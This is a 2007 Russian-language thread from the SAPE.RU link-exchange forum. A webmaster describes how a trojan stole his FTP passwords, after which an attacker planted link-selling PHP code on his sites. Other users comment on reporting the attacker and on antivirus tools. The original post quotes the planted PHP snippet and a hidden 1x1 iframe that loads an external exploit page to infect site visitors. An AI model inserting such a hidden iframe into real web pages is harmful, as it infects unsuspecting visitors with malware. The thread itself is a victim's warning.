Форум SAPE.RU

Форум SAPE.RU (http://forum.sape.ru/index.php)
-   Вопросы по работе системы (http://forum.sape.ru/forumdisplay.php?f=13)
-   -   Злодей продает ссылки на моем сайте через SAPE. Читать всем! (http://forum.sape.ru/showthread.php?t=1649)

Serjee 11.04.2007 15:36

Злодей продает ссылки на моем сайте через SAPE. Читать всем!
 
Возникла интересная проблема:

По средствам вируса, описанного здесь - http://quits.ru/virus-site.html, я потерял несколько паролей к фтп доступу на сайты. Обычно вирус вставляет код с фрэймом, который заражает всех посетителей сайта аналогичной бедой, однако, у меня все оказалось намного интереснее... Тот кто получил пароли решил разместить на части сайтов рекламу через sape.ru

----------------
Стоит свежий Каспер, он не чует ничего страшного. Поставил Avira AntiVir - не чует врага... Пока не нашел антивируса, который нашел бы этот троян.
----------------

В результате у меня есть sape-код злодея, в котором прописан его уникальный идентификатор и с помощью которого администрация sape может помочь найти злодея, или по крайней мере спасти еще десятки сайтов, которые использует злодей в своих черных делах - вычислить кошелек злодея, и обратиться в соответствующие службы.

Вот он злодейский код-sape:
<?php
define('_SAPE_USER', 'e101ae4a03ccfc44d2d9f96a82587799');
require_once($_SERVER['DOCUMENT_ROOT'].'/sape.php');
$sape = new SAPE_client();
echo $sape->return_links();
?>

А вот это заражает нас (вас тоже наверное):
<iframe src="http://wmaukcions.org/exp/index.php" width="1" height="1"</iframe>

Уважаемые администраторы системы. Помогите поймать(или хотя бы остепенить) злодея. Жду поддержки тех кто попадал в аналогичную ситуацию, или по крайней мере не хочет в нее попась.

Со мной можно связаться по почте omegae@mail.ru
или ICQ 301571793

С Уважением, Сергей

msk01 11.04.2007 17:16

Прослезился.
Новое слово в дефейсе - продай ссылки с морды microsoft.com!

Ank 11.04.2007 17:20

Было бы смешно, не будь так грустно...
ужос на самом деле. Таких надо давить.

SergVK 11.04.2007 17:31

Приведенный пост является прямым доказательством хакинга, а последний уголовно преследуется. Вам не сюда, вам в органы.
А мы учтем.

msk01 11.04.2007 18:20

SergVK, очень смешно. Да, туда его и послать ;)

day 11.04.2007 20:13

Сижу я и думаю.. Вот не понравицо мне кто нибудь из вас, вычеслю ваш индефикатор и напишу такой же пост
)))))))))))
p.s. у меня совсем не тот что написали выше) Просто действительно, так подставить можно любого..)

Prost 13.12.2007 12:24

Цитата:

Сообщение от Serjee (Сообщение 11630)
Стоит свежий Каспер, он не чует ничего страшного. Поставил Avira AntiVir - не чует врага... Пока не нашел антивируса, который нашел бы этот троян.

попробуй NOD32 - должен сечь всё. Там ещё и эвристический анализ есть. :cool:

Zeus 13.12.2007 15:33

не приятная ситуация

Andruha2013 13.12.2007 15:55

Цитата:

Сообщение от day (Сообщение 11652)
Сижу я и думаю.. Вот не понравицо мне кто нибудь из вас, вычеслю ваш индефикатор и напишу такой же пост
)))))))))))
p.s. у меня совсем не тот что написали выше) Просто действительно, так подставить можно любого..)

Да ну, ерунда. Вычислите Вы, к примеру, мой идентификатор. Повесите на свой сайт код с моим идентификатором, пожалуетесь на форуме, а дальше что? В моем аккаунте сайта этого нет! В логах тоже записей нет. В чем подстава то?
ЗЫ: идентификатор не мой

leos 13.12.2007 19:00

мораль - сделал сайт, сразу добавь его в сапу. Пусть даже он не пройдет модерацию, но злоумышленник уже никак не сможет добавить сайт, т.к. он уже есть в системе


Часовой пояс GMT +3, время: 15:03.

Работает на vBulletin® версия 3.8.7.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot
SAPE.RU — система купли-продажи ссылок с главных и внутренних страниц сайтов.